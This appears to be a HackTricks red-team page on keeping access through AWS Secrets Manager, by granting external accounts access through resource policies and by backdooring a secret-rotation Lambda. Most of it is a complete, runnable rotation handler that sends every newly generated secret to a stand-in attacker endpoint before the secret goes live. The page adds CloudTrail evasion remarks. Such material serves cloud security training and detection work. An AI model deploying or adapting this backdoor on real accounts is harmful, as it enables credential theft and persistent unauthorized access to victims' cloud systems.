# AWS - Secrets Manager Persistence

{% hint style="success" %} Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

## Secrets Manager

For more info check:

{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} aws-secrets-manager-enum.md {% endcontent-ref %}

### Via Resource Policies

It's possible to grant access to secrets to external accounts via resource policies. Check the Secrets Manager Privesc page for more information. Note that to access a secret, the external account also needs to be allowed to use the KMS key that encrypts it (`kms:Decrypt` in the key policy, plus `kms:GenerateDataKey` if it must also write new versions). This only works with a customer managed key: secrets encrypted with the AWS managed key `aws/secretsmanager` cannot be read cross-account, because that key's policy cannot be edited.

### Via Secrets Rotate Lambda

To rotate secrets automatically, Secrets Manager invokes a configured Lambda function. Its execution role is allowed to read and write the secret, so an attacker who can change the function's code (or its environment variables, layers or handler) can make it exfiltrate every new secret value to an attacker-controlled endpoint. The attacker doesn't need to wait for the rotation schedule either: `secretsmanager:RotateSecret` triggers a rotation immediately by default.

This is what the legitimate (non-backdoored) rotation logic of such a Lambda could look like:

```python
import boto3
import secrets
import string

# Secrets Manager invokes the rotation Lambda with the secret ARN, a
# ClientRequestToken (the id of the new version) and the rotation Step.
def rotate_secrets(event, context):
    # Create a Secrets Manager client
    client = boto3.client('secretsmanager')
    secret_id = event.get('SecretId', 'example_secret_id')

    # Retrieve the current secret value (AWSCURRENT stage)
    secret_value = client.get_secret_value(SecretId=secret_id)['SecretString']

    # Rotate the secret by writing a new value; update_secret creates a new
    # version of the secret and labels it AWSCURRENT
    new_secret_value = rotate_secret(secret_value)
    client.update_secret(SecretId=secret_id, SecretString=new_secret_value)

def rotate_secret(secret_value):
    # Perform the rotation logic here, e.g., generate a new password
    # (a real function also uses the old value to change the credential on
    # the backend system before returning the new one)
    return generate_password()

def generate_password(length=16):
    # Generate a random password using the cryptographically secure secrets module
    alphabet = string.ascii_letters + string.digits
    return ''.join(secrets.choice(alphabet) for _ in range(length))
```
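The following is an added example, not code from the original page or from HackTricks: a rotation Lambda written against the four-step protocol Secrets Manager actually drives (`createSecret`, `setSecret`, `testSecret`, `finishSecret`), with the attacker's exfiltration tap placed in `createSecret` so the new credential is sent out before any consumer reads it. The `EXFIL_URL`, the secret ARN and the `FakeSecretsManager` class (an in-memory stand-in for the boto3 client so the block runs offline) are assumptions for illustration; in a real deployment `client` would be the real `boto3` client.

```python
import json
import secrets
import string
import urllib.request

# Hypothetical attacker-controlled collector (assumption, not from the page).
EXFIL_URL = "https://attacker.example/collect"


def generate_password(length=32):
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def http_post(url, body):
    """Default exfiltration transport; tests swap it out so nothing leaves the host."""
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=3) as resp:
        resp.read()


class FakeSecretsManager:
    """Constructed in-memory stand-in for the boto3 secretsmanager client.
    Only the calls the handler makes are modelled (staging labels included)."""

    class exceptions:
        class ResourceNotFoundException(Exception):
            pass

    def __init__(self, current_value):
        self.versions = {"v0": {"value": current_value, "stages": {"AWSCURRENT"}}}

    def get_secret_value(self, SecretId, VersionId=None, VersionStage=None):
        if VersionId is None and VersionStage is None:
            VersionStage = "AWSCURRENT"  # boto3's default when nothing is given
        for vid, v in self.versions.items():
            if (VersionId is None or vid == VersionId) and (VersionStage is None or VersionStage in v["stages"]):
                return {"VersionId": vid, "SecretString": v["value"]}
        raise self.exceptions.ResourceNotFoundException(f"{SecretId}: no matching version")

    def put_secret_value(self, SecretId, ClientRequestToken, SecretString, VersionStages):
        self.versions[ClientRequestToken] = {"value": SecretString, "stages": set(VersionStages)}

    def update_secret_version_stage(self, SecretId, VersionStage, MoveToVersionId, RemoveFromVersionId=None):
        if RemoveFromVersionId is not None:
            self.versions[RemoveFromVersionId]["stages"].discard(VersionStage)
            self.versions[RemoveFromVersionId]["stages"].add("AWSPREVIOUS")
        self.versions[MoveToVersionId]["stages"].add(VersionStage)


def lambda_handler(event, context, client=None, sender=http_post):
    """Rotation handler following the Secrets Manager step protocol, backdoored."""
    if client is None:
        import boto3  # real deployment; the fake above is used offline
        client = boto3.client("secretsmanager")
    secret_id, token, step = event["SecretId"], event["ClientRequestToken"], event["Step"]

    if step == "createSecret":
        try:
            client.get_secret_value(SecretId=secret_id, VersionId=token, VersionStage="AWSPENDING")
            return  # Lambda retry of an already-created version: stay idempotent
        except client.exceptions.ResourceNotFoundException:
            pass
        new_value = generate_password()
        client.put_secret_value(SecretId=secret_id, ClientRequestToken=token,
                                SecretString=new_value, VersionStages=["AWSPENDING"])
        # Backdoor: ship the credential out before it is even marked AWSCURRENT.
        sender(EXFIL_URL, json.dumps({"secret": secret_id, "version": token, "value": new_value}).encode())
    elif step == "setSecret":
        pass  # legitimate code pushes the AWSPENDING value to the backend (DB user, API key)
    elif step == "testSecret":
        pass  # legitimate code verifies the AWSPENDING credential actually works
    elif step == "finishSecret":
        current = client.get_secret_value(SecretId=secret_id, VersionStage="AWSCURRENT")
        if current["VersionId"] != token:
            client.update_secret_version_stage(SecretId=secret_id, VersionStage="AWSCURRENT",
                                               MoveToVersionId=token, RemoveFromVersionId=current["VersionId"])
    else:
        raise ValueError(f"unknown rotation step {step!r}")


def run_rotation(client, secret_id="arn:aws:secretsmanager:us-east-1:123456789012:secret:demo", token="v1"):
    """Drive the four steps the way Secrets Manager would; return what the tap leaked."""
    leaked = []
    capture = lambda url, body: leaked.append(json.loads(body))
    for step in ("createSecret", "setSecret", "testSecret", "finishSecret"):
        lambda_handler({"SecretId": secret_id, "ClientRequestToken": token, "Step": step},
                       None, client=client, sender=capture)
    return leaked


if __name__ == "__main__":
    sm = FakeSecretsManager("old-password")
    print(run_rotation(sm))
```

Because the tap runs inside the rotation function's own execution role, no extra IAM permissions and no new principal are involved; from CloudTrail the only signs are the `UpdateFunctionCode` (or `UpdateFunctionConfiguration`) call against the rotation function and, if the attacker forces it, a `RotateSecret` call outside the usual schedule.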
